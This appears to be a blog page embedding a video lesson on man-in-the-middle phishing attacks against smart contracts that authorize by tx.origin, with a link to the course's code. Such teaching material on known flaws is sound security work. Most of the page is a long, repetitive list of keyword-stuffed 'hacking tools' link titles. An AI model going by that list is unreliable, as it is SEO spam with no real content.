
Phishing MITM Attack Walk Through: 





Smart Contract Hacking - 0x10 - Man In The Middle(MITM) Phishing Attacks Via TX.Origin Authorization.mp4 from Console Cowboys on Vimeo.


References

Github code for this chapter:  https://github.com/cclabsInc/BlockChainExploitation/tree/master/2020_BlockchainFreeCourse/Tx.Origin

Related links

  1. What Are Hacking Tools
  2. Hacker Tools Apk
  3. Hacker Hardware Tools
  4. Hack Tools For Ubuntu
  5. Ethical Hacker Tools
  6. Pentest Tools List
  7. Tools For Hacker
  8. How To Make Hacking Tools
  9. Hack Tools For Pc
  10. Hack Tools For Mac
  11. Hacker Tools For Windows
  12. Hacking App
  13. Tools Used For Hacking
  14. Game Hacking
  15. Hacking Tools For Kali Linux
  16. Nsa Hack Tools
  17. Pentest Recon Tools
  18. Kik Hack Tools
  19. Hacking Tools Usb
  20. Hacking Tools Online
  21. Pentest Tools For Mac
  22. Hacking Tools
  23. Beginner Hacker Tools
  24. Hacking Tools For Beginners
  25. Pentest Tools Free
  26. Pentest Tools Tcp Port Scanner
  27. Physical Pentest Tools
  28. Game Hacking
  29. Pentest Tools Apk
  30. Kik Hack Tools
  31. Pentest Tools For Android
  32. Hacking Tools For Beginners
  33. Hack Tools For Windows
  34. Hackers Toolbox
  35. Hack Rom Tools
  36. Pentest Tools Online
  37. Easy Hack Tools
  38. Nsa Hack Tools
  39. Hack Tool Apk
  40. Hack Tools For Ubuntu
  41. Hacking Tools For Mac
  42. Usb Pentest Tools
  43. Hacker Tools Online
  44. Pentest Tools For Mac
  45. Pentest Tools Online
  46. Hack App
  47. Hacker Tools Free Download
  48. Hacker Tools Mac
  49. Pentest Tools Bluekeep
  50. Hacking Tools For Pc
  51. New Hacker Tools
  52. Hackrf Tools
  53. Hacking Tools For Beginners
  54. Blackhat Hacker Tools
  55. Pentest Tools Bluekeep
  56. Hack Tools Mac
  57. Hack Tools For Pc
  58. Hack Tools For Mac
  59. New Hacker Tools
  60. Hacker Tools For Pc
  61. Hacking Tools For Windows Free Download
  62. Hacker Tools 2019
  63. Hacker Hardware Tools
  64. Pentest Tools Framework
  65. Beginner Hacker Tools
  66. Hacker Tools Online
  67. Hacking Tools For Windows Free Download
  68. Hacking Tools Windows 10
  69. Hacking Tools For Beginners
  70. Nsa Hacker Tools
  71. Hacking Tools Download
  72. Pentest Tools Online
  73. Hacker Tools For Pc
  74. Computer Hacker
  75. Hack Tools Github
  76. Hack Rom Tools
  77. Pentest Tools Website Vulnerability
  78. Hacker Tools For Windows
  79. Hacker Tools For Ios
  80. Pentest Recon Tools
  81. Hacking Tools For Windows Free Download
  82. Hack And Tools
  83. Hackers Toolbox
  84. Hacking Tools
  85. Hack Tools Mac
  86. Hacker Tools Free
  87. Pentest Tools Nmap
  88. Pentest Tools Apk
  89. Hacker Tools Linux
  90. Hacker Tools Github
  91. Hacking Tools 2019
  92. Hacker Tools
  93. Hacker Tools For Ios
  94. What Are Hacking Tools
  95. Hacker Tools Mac
  96. Pentest Tools Nmap
  97. Hack Apps
  98. Hacking Tools Kit
  99. Pentest Tools Tcp Port Scanner
  100. How To Make Hacking Tools
  101. World No 1 Hacker Software
  102. Hacking App
  103. Usb Pentest Tools
  104. World No 1 Hacker Software
  105. Hacking Tools For Windows
  106. Pentest Tools For Android
  107. Hacker Tools 2020
  108. Hacking Tools Kit
  109. Pentest Tools Android
  110. Hacker Tools Github
  111. Computer Hacker
  112. Hacking Tools Pc
  113. Hacking Tools For Pc
  114. World No 1 Hacker Software
  115. Hacking Tools 2019
  116. Hacker Security Tools
  117. Hacker Tools Apk Download
  118. Hacking Tools For Pc
  119. Hacking Tools For Mac
  120. Usb Pentest Tools
  121. Hacker Tools For Windows
  122. Tools For Hacker
  123. Hack Tools Pc
  124. Android Hack Tools Github
  125. Hacker Tools Mac
  126. Android Hack Tools Github
  127. Hack Rom Tools
  128. Hacker Search Tools